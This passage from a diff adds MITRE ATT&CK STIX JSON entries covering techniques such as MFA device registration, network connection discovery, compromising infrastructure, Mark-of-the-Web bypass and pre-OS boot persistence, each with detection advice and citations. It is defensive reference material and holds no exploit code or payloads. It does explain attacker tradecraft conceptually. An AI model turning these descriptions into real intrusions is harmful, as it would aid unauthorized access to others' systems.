"https://github.com/GhostPack/SharpDPAPI#certificates" + }, + { + "source_name": "Microsoft AD CS Overview", + "description": "Microsoft. (2016, August 31). Active Directory Certificate Services Overview. Retrieved August 2, 2022.", + "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh831740(v=ws.11)" + }, + { + "source_name": "Medium Certified Pre Owned", + "description": "Schroeder, W. (2021, June 17). Certified Pre-Owned. Retrieved August 2, 2022.", + "url": "https://posts.specterops.io/certified-pre-owned-d95910965cd2" + }, + { + "source_name": "SpecterOps Certified Pre Owned", + "description": "Schroeder, W. & Christensen, L. (2021, June 22). Certified Pre-Owned - Abusing Active Directory Certificate Services. Retrieved August 2, 2022.", + "url": "https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf" + }, + { + "source_name": "O365 Blog Azure AD Device IDs", + "description": "Syynimaa, N. (2022, February 15). Stealing and faking Azure AD device identities. Retrieved August 3, 2022.", + "url": "https://o365blog.com/post/deviceidentity/" + }, + { + "source_name": "GitHub CertStealer", + "description": "TheWover. (2021, April 21). CertStealer. Retrieved August 2, 2022.", + "url": "https://github.com/TheWover/CertStealer" + }, + { + "source_name": "APT29 Deep Look at Credential Roaming", + "description": "Thibault Van Geluwe De Berlaere. (2022, November 8). They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming. Retrieved November 9, 2022.", + "url": "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-03T17:38:39.065Z", + "name": "Device Registration", + "description": "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.\n\nMFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pawel Partyka, Microsoft 365 Defender", + "Mike Moran", + "Joe Gumke, U.S. Bank", + "Arad Inbar, Fidelis Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Azure AD", + "Windows", + "SaaS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", + "created": "2022-03-04T18:30:38.989Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1098/005", + "external_id": "T1098.005" + }, + { + "source_name": "CISA MFA PrintNightmare", + "description": "Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved March 16, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-074a" + }, + { + "source_name": "Mandiant APT29 Microsoft 365 2022", + "description": "Douglas Bienstock. (2022, August 18). You Can’t Audit Me: APT29 Continues Targeting Microsoft 365. Retrieved February 23, 2023.", + "url": "https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft" + }, + { + "source_name": "AADInternals - Conditional Access Bypass", + "description": "Dr. Nestori Syynimaa. (2020, September 6). Bypassing conditional access by faking device compliance. Retrieved March 4, 2022.", + "url": "https://o365blog.com/post/mdm" + }, + { + "source_name": "AADInternals - BPRT", + "description": "Dr. Nestori Syynimaa. (2021, January 31). BPRT unleashed: Joining multiple devices to Azure AD and Intune. Retrieved March 4, 2022.", + "url": "https://o365blog.com/post/bprt/" + }, + { + "source_name": "AADInternals - Device Registration", + "description": "Dr. Nestori Syynimaa. (2021, March 3). Deep-dive to Azure AD device join. Retrieved March 9, 2022.", + "url": "https://o365blog.com/post/devices/" + }, + { + "source_name": "DarkReading FireEye SolarWinds", + "description": "Kelly Jackson Higgins. (2021, January 7). FireEye's Mandia: 'Severity-Zero Alert' Led to Discovery of SolarWinds Attack. Retrieved April 18, 2022.", + "url": "https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack" + }, + { + "source_name": "Microsoft - Device Registration", + "description": "Microsoft 365 Defender Threat Intelligence Team. (2022, January 26). Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA. Retrieved March 4, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa" + }, + { + "source_name": "Microsoft DEV-0537", + "description": "Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "System Network Connections Discovery", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\nAn adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.\n\nUtilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to \"net session\". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets, show tcp brief).(Citation: US-CERT-TA18-106A)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS", + "Network" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "created": "2017-05-31T21:30:45.139Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1049", + "external_id": "T1049" + }, + { + "source_name": "Amazon AWS VPC Guide", + "description": "Amazon. (n.d.). What Is Amazon VPC?. Retrieved October 6, 2019.", + "url": "https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html" + }, + { + "source_name": "Microsoft Azure Virtual Network Overview", + "description": "Annamalai, N., Casey, C., Almeida, M., et. al.. (2019, June 18). What is Azure Virtual Network?. Retrieved October 6, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview" + }, + { + "source_name": "Google VPC Overview", + "description": "Google. (2019, September 23). Virtual Private Cloud (VPC) network overview. Retrieved October 6, 2019.", + "url": "https://cloud.google.com/vpc/docs/vpc" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-28T03:53:28.299Z", + "name": "Compromise Infrastructure", + "description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking)\n\nBy using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jeremy Galloway", + "Shailesh Tiwary (Indian Army)", + "Goldstein Menachem" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet. \n\nOnce adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "created": "2020-10-01T00:36:30.759Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1584", + "external_id": "T1584" + }, + { + "source_name": "amnesty_nso_pegasus", + "description": "Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group’s Pegasus. Retrieved February 22, 2022.", + "url": "https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/" + }, + { + "source_name": "Sysdig Proxyjacking", + "description": "Crystal Morin. (2023, April 4). Proxyjacking has Entered the Chat. Retrieved July 6, 2023.", + "url": "https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/" + }, + { + "source_name": "FireEye DNS Hijack 2019", + "description": "Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html" + }, + { + "source_name": "ICANNDomainNameHijacking", + "description": "ICANN Security and Stability Advisory Committee. (2005, July 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved March 6, 2017.", + "url": "https://www.icann.org/groups/ssac/documents/sac-007-en" + }, + { + "source_name": "Koczwara Beacon Hunting Sep 2021", + "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", + "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + }, + { + "source_name": "Talos DNSpionage Nov 2018", + "description": "Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.", + "url": "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" + }, + { + "source_name": "NSA NCSC Turla OilRig", + "description": "NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.", + "url": "https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf" + }, + { + "source_name": "Mandiant SCANdalous Jul 2020", + "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", + "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + }, + { + "source_name": "FireEye EPS Awakens Part 2", + "description": "Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "url": "https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-22T14:19:50.768Z", + "name": "Mark-of-the-Web Bypass", + "description": "Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)\n\nAdversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Christiaan Beek, @ChristiaanBeek" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.(Citation: Disable automount for ISO)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7e7c2fba-7cca-486c-9582-4c1bb2851961", + "created": "2021-02-22T14:20:31.650Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1553/005", + "external_id": "T1553.005" + }, + { + "source_name": "Beek Use of VHD Dec 2020", + "description": "Beek, C. (2020, December 3). Investigating the Use of VHD Files By Cybercriminals. Retrieved February 22, 2021.", + "url": "https://medium.com/swlh/investigating-the-use-of-vhd-files-by-cybercriminals-3f1f08304316" + }, + { + "source_name": "Outflank MotW 2020", + "description": "Hegt, S. (2020, March 30). Mark-of-the-Web from a red team’s perspective. Retrieved February 22, 2021.", + "url": "https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective/" + }, + { + "source_name": "Intezer Russian APT Dec 2020", + "description": "Kennedy, J. (2020, December 9). A Zebra in Gopher's Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy. Retrieved February 22, 2021.", + "url": "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/" + }, + { + "source_name": "Microsoft Zone.Identifier 2020", + "description": "Microsoft. (2020, August 31). Zone.Identifier Stream Name. Retrieved February 22, 2021.", + "url": "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/6e3f7352-d11c-4d76-8c39-2516a9df36e8" + }, + { + "source_name": "Disable automount for ISO", + "description": "wordmann. (2022, February 8). Disable Disc Imgage. Retrieved February 8, 2022.", + "url": "https://gist.github.com/wdormann/fca29e0dcda8b5c0472e73e10c78c3e7" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Disable Crypto Hardware", + "description": "Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5", + "created": "2020-10-19T19:11:18.757Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1600/002", + "external_id": "T1600.002" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-26T14:26:14.364Z", + "name": "Pre-OS Boot", + "description": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)\n\nAdversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.\n\nDisk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "Network", + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Host intrusion prevention systems", + "File monitoring" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "created": "2019-11-13T14:44:49.439Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1542", + "external_id": "T1542" + }, + { + "source_name": "ITWorld Hard Disk Health Dec 2014", + "description": "Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018.", + "url": "https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html" + }, + { + "source_name": "Wikipedia Booting", + "description": "Wikipedia. (n.d.). Booting. Retrieved November 13, 2019.", + "url": "https://en.wikipedia.org/wiki/Booting" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-01-27T14:49:39.188Z", + "name": "Scripting", + "description": "**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**\n\nAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and [PowerShell](https://attack.mitre.org/techniques/T1086) but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_detection": "Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.\n\nAnalyze Office file attachments for potentially malicious macros. Execution of macros may create suspicious process trees depending on what the macro is designed to do. Office processes, such as winword.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity. (Citation: Uperesia Malicious Office Documents)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Process whitelisting", + "Data Execution Prevention", + "Exploit Prevention" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7fd87010-3a00-4da3-b905-410525e8ec44", + "created": "2017-05-31T21:30:51.733Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1064", + "external_id": "T1064" + }, + { + "source_name": "Metasploit_Ref", + "description": "Metasploit. (n.d.). Retrieved December 4, 2014.", + "url": "http://www.metasploit.com" + }, + { + "source_name": "Veil_Ref", + "description": "Veil Framework. (n.d.). Retrieved December 4, 2014.", + "url": "https://www.veil-framework.com/framework/" + }, + { + "source_name": "Powersploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "url": "https://github.com/mattifestation/PowerSploit" + }, + { + "source_name": "Alperovitch 2014", + "description": "Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.", + "url": "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/" + }, + { + "source_name": "Uperesia Malicious Office Documents", + "description": "Felix. (2016, September). Analyzing Malicious Office Documents. Retrieved April 11, 2018.", + "url": "https://www.uperesia.com/analyzing-malicious-office-documents" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Build Image on Host", + "description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)\n\nAn adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image 